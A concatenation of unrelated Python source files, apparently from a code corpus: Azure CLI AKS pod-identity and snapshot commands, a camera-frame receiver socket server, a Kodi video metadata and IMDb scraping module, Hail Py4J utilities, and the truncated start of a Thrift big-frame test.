config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the snapshot "{}" in resource group "{}", Are you sure?'.format(name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
CameraReceiverProcess.py | # Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
sys.path.append('.')
import time
import socket
import struct
import numpy as np
import cv2
from threading import Thread
import multiprocessing
from multiprocessing import Process,Event
from src.templates.workerprocess import WorkerProcess
class CameraReceiverProcess(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""Process used for debugging. Can be used as a direct frame analyzer, instead of using the VNC
It receives the images from the raspberry and displays them.
Parameters
----------
inPs : list(Pipe)
List of input pipes
outPs : list(Pipe)
List of output pipes
"""
super(CameraReceiverProcess,self).__init__(inPs, outPs)
self.imgSize = (480,640,3)
# ===================================== RUN ==========================================
def run(self):
"""Apply the initializers and start the threads.
"""
self._init_socket()
super(CameraReceiverProcess,self).run()
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket server.
"""
self.port = 2244
self.serverIp = '0.0.0.0'
self.server_socket = socket.socket()
self.server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.server_socket.bind((self.serverIp, self.port))
self.server_socket.listen(0)
self.connection = self.server_socket.accept()[0].makefile('rb')
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the read thread to receive and display the frames.
"""
readTh = Thread(name = 'StreamReceivingThread',target = self._read_stream)
self.threads.append(readTh)
# ===================================== READ STREAM ==================================
def _read_stream(self):
"""Read the image from input stream, decode it and display it with the CV2 library.
"""
try:
while True:
# decode image
image_len = struct.unpack('<L', self.connection.read(struct.calcsize('<L')))[0]
bts = self.connection.read(image_len)
# ----------------------- read image -----------------------
image = np.frombuffer(bts, np.uint8)
image = cv2.imdecode(image, cv2.IMREAD_COLOR)
image = np.reshape(image, self.imgSize)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# ----------------------- show images -------------------
cv2.imshow('Image', image)
cv2.waitKey(1)
except:
pass
finally:
self.connection.close()
self.server_socket.close()
|
video.py | # -*- coding: utf-8 -*-
import os
import json
import struct
import hashlib
import re
import threading
from .kodi import xbmc, xbmcvfs, get_bool_setting
from . import logger, cache, utils, request
__64k = 65536
__longlong_format_char = 'q'
__byte_size = struct.calcsize(__longlong_format_char)
def __sum_64k_bytes(file, result):
range_value = __64k / __byte_size
if utils.py3:
range_value = round(range_value)
for _ in range(range_value):
try: chunk = file.readBytes(__byte_size)
except: chunk = file.read(__byte_size)
(value,) = struct.unpack(__longlong_format_char, chunk)
result.filehash += value
result.filehash &= 0xFFFFFFFFFFFFFFFF
def __set_size_and_hash(core, meta, filepath):
if core.progress_dialog and not core.progress_dialog.dialog:
core.progress_dialog.open()
f = xbmcvfs.File(filepath)
try:
filesize = meta.filesize = f.size()
# used for mocking
try:
meta.filehash = f.hash()
return
except: pass
if filesize < __64k * 2:
return
# ref: https://trac.opensubtitles.org/projects/opensubtitles/wiki/HashSourceCodes
# filehash = filesize + 64bit sum of the first and last 64k of the file
result = lambda: None
result.filehash = filesize
__sum_64k_bytes(f, result)
f.seek(filesize - __64k, os.SEEK_SET)
__sum_64k_bytes(f, result)
meta.filehash = "%016x" % result.filehash
logger.notice(meta.filehash)
finally:
f.close()
def __get_filename(title):
filename = title
video_exts = ['mkv', 'mp4', 'avi', 'mov', 'mpeg', 'flv', 'wmv']
try:
filepath = xbmc.Player().getPlayingFile()
filename = filepath.split('/')[-1]
filename = utils.unquote(filename)
for ext in video_exts:
if ext in filename:
filename = filename[:filename.index(ext) + len(ext)]
break
except: pass
return filename
def __scrape_tvshow_year(core, meta):
imdb_response = request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/' + meta.imdb_id,
'timeout': 10,
})
if imdb_response.status_code != 200:
return
show_year_match = re.search(r' %s \((.*?)\)"' % meta.tvshow, imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<title>.*?\(TV (?:Mini-)?Series (\d\d\d\d).*?</title>', imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<span class="parentDate">\((\d\d\d\d).*?\)</span>', imdb_response.text)
if show_year_match:
meta.tvshow_year = show_year_match.group(1).strip()
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
def __scrape_imdb_id(core, meta):
if meta.title == '' or meta.year == '':
return
is_movie = meta.season == '' and meta.episode == ''
title = (meta.title if is_movie else meta.tvshow).lower()
year = '_%s' % meta.year if is_movie else ''
query = '%s%s' % (title.lower().replace(' ', '_'), year)
query = query[:20]
request = {
'method': 'GET',
'url': 'https://v2.sg.media-imdb.com/suggestion/%s/%s.json' % (query[:1], query),
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
results = core.json.loads(response.text)
if len(results['d']) == 0:
return
def filter_movie_results(result):
year_start = result.get('y', None)
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['feature', 'TV movie'] and
result['l'].lower() == title and
(year_start is not None and year_start == year)
)
if is_movie:
year = int(meta.year)
results = list(filter(filter_movie_results, results['d']))
if len(results) > 0:
meta.imdb_id = results[0]['id']
return
show_title = title.lower()
episode_title = meta.title.lower()
episode_year = int(meta.year)
def filter_tvshow_results(result):
year_start = result.get('y', None)
year_end = result.get('yr', '-').split('-')[1]
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['TV series', 'TV mini-series'] and
result['l'].lower() == show_title and
(year_start is not None and year_start <= episode_year) and
(year_end == '' or int(year_end) >= episode_year)
)
results = list(filter(filter_tvshow_results, results['d']))
if len(results) == 0:
return
if len(results) == 1:
meta.tvshow_year = str(results[0]['y'])
meta.imdb_id = results[0]['id']
return
episode_title_pattern = r'title=\"' + re.escape(episode_title) + r'\"'
for result in results:
episodes_response = core.request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/%s/episodes/_ajax?season=%s' % (result['id'], meta.season),
'timeout': 10
})
if episodes_response.status_code != 200:
continue
if re.search(episode_title_pattern, episodes_response.text, re.IGNORECASE):
meta.tvshow_year = str(result['y'])
meta.imdb_id = result['id']
return
def __update_info_from_imdb(core, meta, pagination_token=''):
request = {
'method': 'POST',
'url': 'https://graphql.imdb.com',
'data': core.json.dumps({
'query': '''
query TitlesList($idArray: [ID!]!, $paginationToken: ID) {
titles(ids: $idArray) {
id
titleText {
text
}
releaseDate {
year
}
series {
series {
id,
titleText {
text
}
releaseDate {
year
}
}
episodeNumber {
episodeNumber
seasonNumber
}
}
episodes {
...TMD_Episodes_EpisodesCardContainer
}
}
}
fragment TMD_Episodes_EpisodesCardContainer on Episodes {
result: episodes(first: 250, after: $paginationToken) {
edges {
node {
...TMD_Episodes_EpisodeCard
}
}
pageInfo {
hasNextPage
endCursor
}
}
}
fragment TMD_Episodes_EpisodeCard on Title {
id
titleText {
text
}
releaseDate {
year
}
series {
episodeNumber {
episodeNumber
seasonNumber
}
}
}
''',
'operationName': 'TitlesList',
'variables': {
'idArray': [meta.imdb_id],
'paginationToken': pagination_token
},
}),
'headers': {
'content-type': 'application/json',
},
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
try:
result = json.loads(response.text)
result = result['data']['titles'][0]
if result['episodes'] is None:
meta.title = result['titleText']['text']
meta.year = str(result['releaseDate']['year'])
if result['series'] is not None:
meta.tvshow = result['series']['series']['titleText']['text']
meta.tvshow_year = str(result['series']['series']['releaseDate']['year'])
meta.season = str(result['series']['episodeNumber']['seasonNumber'])
meta.episode = str(result['series']['episodeNumber']['episodeNumber'])
else:
meta.tvshow = result['titleText']['text']
meta.tvshow_year = str(result['releaseDate']['year'])
episodes = result['episodes']['result']['edges']
s_number = int(meta.season)
ep_number = int(meta.episode)
found = False
for episode in episodes:
ep = episode['node']
series = ep['series']['episodeNumber']
if series['episodeNumber'] == ep_number and series['seasonNumber'] == s_number:
meta.title = ep['titleText']['text']
meta.year = str(ep['releaseDate']['year'])
meta.imdb_id = ep['id']
found = True
if not found and result['episodes']['result']['pageInfo']['hasNextPage']:
return __update_info_from_imdb(core, meta, result['episodes']['result']['pageInfo']['endCursor'])
except:
return
def __get_basic_info():
meta = utils.DictAsObject({})
meta.year = xbmc.getInfoLabel('VideoPlayer.Year')
meta.season = xbmc.getInfoLabel('VideoPlayer.Season')
meta.episode = xbmc.getInfoLabel('VideoPlayer.Episode')
meta.tvshow = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')
meta.tvshow_year = ''
meta.title = xbmc.getInfoLabel('VideoPlayer.OriginalTitle')
if meta.title == '':
meta.title = xbmc.getInfoLabel('VideoPlayer.Title')
meta.filename = __get_filename(meta.title)
meta.filename_without_ext = meta.filename
meta.imdb_id = xbmc.getInfoLabel('VideoPlayer.IMDBNumber')
filename_and_path = xbmc.getInfoLabel('Player.FilenameAndPath')
if meta.imdb_id == '':
regex_result = re.search(r'.*(tt\d{7,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.imdb_id = regex_result.group(1)
if meta.season == '':
regex_result = re.search(r'.*season=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.season = regex_result.group(1)
if meta.episode == '':
regex_result = re.search(r'.*episode=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.episode = regex_result.group(1)
return meta
def get_meta(core):
meta = __get_basic_info()
if meta.imdb_id == '':
cache_key = cache.hash_data(meta)
imdb_id_cache = cache.get_imdb_id_cache()
meta.imdb_id = imdb_id_cache.get(cache_key, '')
if meta.imdb_id == '':
__scrape_imdb_id(core, meta)
if meta.imdb_id != '':
imdb_id_cache[cache_key] = meta.imdb_id
cache.save_imdb_id_cache(imdb_id_cache)
if meta.tvshow_year != '':
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
if meta.imdb_id != '':
__update_info_from_imdb(core, meta)
meta_cache = cache.get_meta_cache()
if meta.imdb_id != '' and meta_cache.imdb_id == meta.imdb_id and meta_cache.filename == meta.filename:
meta = meta_cache
else:
meta.filesize = ''
meta.filehash = ''
try:
filepath = xbmc.Player().getPlayingFile()
__set_size_and_hash(core, meta, filepath)
except:
import traceback
traceback.print_exc()
try:
meta.filename_without_ext = os.path.splitext(meta.filename)[0]
except: pass
meta_json = json.dumps(meta, indent=2)
logger.debug(meta_json)
meta = json.loads(meta_json)
meta = utils.DictAsObject(meta)
for key in meta.keys():
value = utils.strip_non_ascii_and_unprintable(meta[key])
meta[key] = str(value).strip()
cache.save_meta_cache(meta)
meta.is_tvshow = meta.tvshow != ''
meta.is_movie = not meta.is_tvshow
tvshow_year_requiring_service_enabled = (
get_bool_setting('podnadpisi', 'enabled') or
get_bool_setting('addic7ed', 'enabled')
)
if meta.is_tvshow and meta.imdb_id != '' and meta.tvshow_year == '' and tvshow_year_requiring_service_enabled:
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_year = tvshow_years_cache.get(meta.imdb_id, '')
if tvshow_year != '':
meta.tvshow_year = tvshow_year
else:
meta.tvshow_year_thread = threading.Thread(target=__scrape_tvshow_year, args=(core, meta))
meta.tvshow_year_thread.start()
return meta
|
java.py | import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
""":class:`.FatalError` is an error thrown by Hail method failures"""
class Env:
_jvm = None
_gateway = None
_hail_package = None
_jutils = None
_hc = None
_counter = 0
_seed_generator = None
@staticmethod
def get_uid():
Env._counter += 1
return "__uid_{}".format(Env._counter)
@staticmethod
def jvm():
if not Env._jvm:
Env.hc()
assert Env._jvm is not None
return Env._jvm
@staticmethod
def hail():
if not Env._hail_package:
Env._hail_package = getattr(Env.jvm(), 'is').hail
return Env._hail_package
@staticmethod
def gateway():
if not Env._gateway:
Env.hc()
assert Env._gateway is not None
return Env._gateway
@staticmethod
def jutils():
if not Env._jutils:
Env._jutils = scala_package_object(Env.hail().utils)
return Env._jutils
@staticmethod
def hc():
if not Env._hc:
from hail.context import init
import sys
sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
init()
assert Env._hc is not None
return Env._hc
@staticmethod
def sql_context():
return Env.hc()._sql_context
_dummy_table = None
@staticmethod
def dummy_table():
if Env._dummy_table is None:
import hail
Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
return Env._dummy_table
@staticmethod
def set_seed(seed):
Env._seed_generator = hail.utils.HailSeedGenerator(seed)
@staticmethod
def next_seed():
if Env._seed_generator is None:
Env.set_seed(None)
return Env._seed_generator.next_seed()
def jarray(jtype, lst):
jarr = Env.gateway().new_array(jtype, len(lst))
for i, s in enumerate(lst):
jarr[i] = s
return jarr
def scala_object(jpackage, name):
return getattr(getattr(jpackage, name + '$'), 'MODULE$')
def scala_package_object(jpackage):
return scala_object(jpackage, 'package')
def jnone():
return scala_object(Env.jvm().scala, 'None')
def jsome(x):
return Env.jvm().scala.Some(x)
def joption(x):
return jsome(x) if x else jnone()
def from_option(x):
return x.get() if x.isDefined() else None
def jindexed_seq(x):
return Env.jutils().arrayListToISeq(x)
def jset(x):
return Env.jutils().arrayListToSet(x)
def jindexed_seq_args(x):
args = [x] if isinstance(x, str) else x
return jindexed_seq(args)
def jset_args(x):
args = [x] if isinstance(x, str) else x
return jset(args)
def jiterable_to_list(it):
if it is not None:
return list(Env.jutils().iterableToArrayList(it))
else:
return None
def escape_str(s):
return Env.jutils().escapePyString(s)
def parsable_strings(strs):
strs = ' '.join(f'"{escape_str(s)}"' for s in strs)
return f"({strs})"
_parsable_str = re.compile(r'[\w_]+')
def escape_parsable(s):
if _parsable_str.fullmatch(s):
return s
else:
return '`' + s.encode('unicode_escape').decode('utf-8').replace('`', '\\`') + '`'
def unescape_parsable(s):
return bytes(s.replace('\\`', '`'), 'utf-8').decode('unicode_escape')
def escape_id(s):
return Env.jutils().escapeIdentifier(s)
def jarray_to_list(a):
return list(a) if a else None
class Log4jLogger:
log_pkg = None
@staticmethod
def get():
if Log4jLogger.log_pkg is None:
Log4jLogger.log_pkg = Env.jutils()
return Log4jLogger.log_pkg
def error(msg):
Log4jLogger.get().error(msg)
def warn(msg):
Log4jLogger.get().warn(msg)
def info(msg):
Log4jLogger.get().info(msg)
def handle_java_exception(f):
def deco(*args, **kwargs):
import pyspark
try:
return f(*args, **kwargs)
except py4j.protocol.Py4JJavaError as e:
s = e.java_exception.toString()
# py4j catches NoSuchElementExceptions to stop array iteration
if s.startswith('java.util.NoSuchElementException'):
raise
tpl = Env.jutils().handleForPython(e.java_exception)
deepest, full = tpl._1(), tpl._2()
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
except pyspark.sql.utils.CapturedException as e:
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None
return deco
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
Env.jutils().addSocketAppender(host, port)
|
BigFrameTest.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import socket
from threading import Thread
from ThriftTest import ThriftTest
from thrift.transport import TSocket
from thrift.transport.THeaderTransport import MAX_BIG_FRAME_SIZE
from thrift.protocol import THeaderProtocol
from thrift.server import TCppServer
class TestHandler(ThriftTest.Iface):
def testString(self, str):
return str * 2**30
def create_server():
processor = ThriftTest.Processor(TestHandler())
server = TCppServer.TCppServer(processor)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 0))
port = sock.getsockname()[1]
server.setPort(port)
t = Thread(name="test_tcpp_server", target=server.serve)
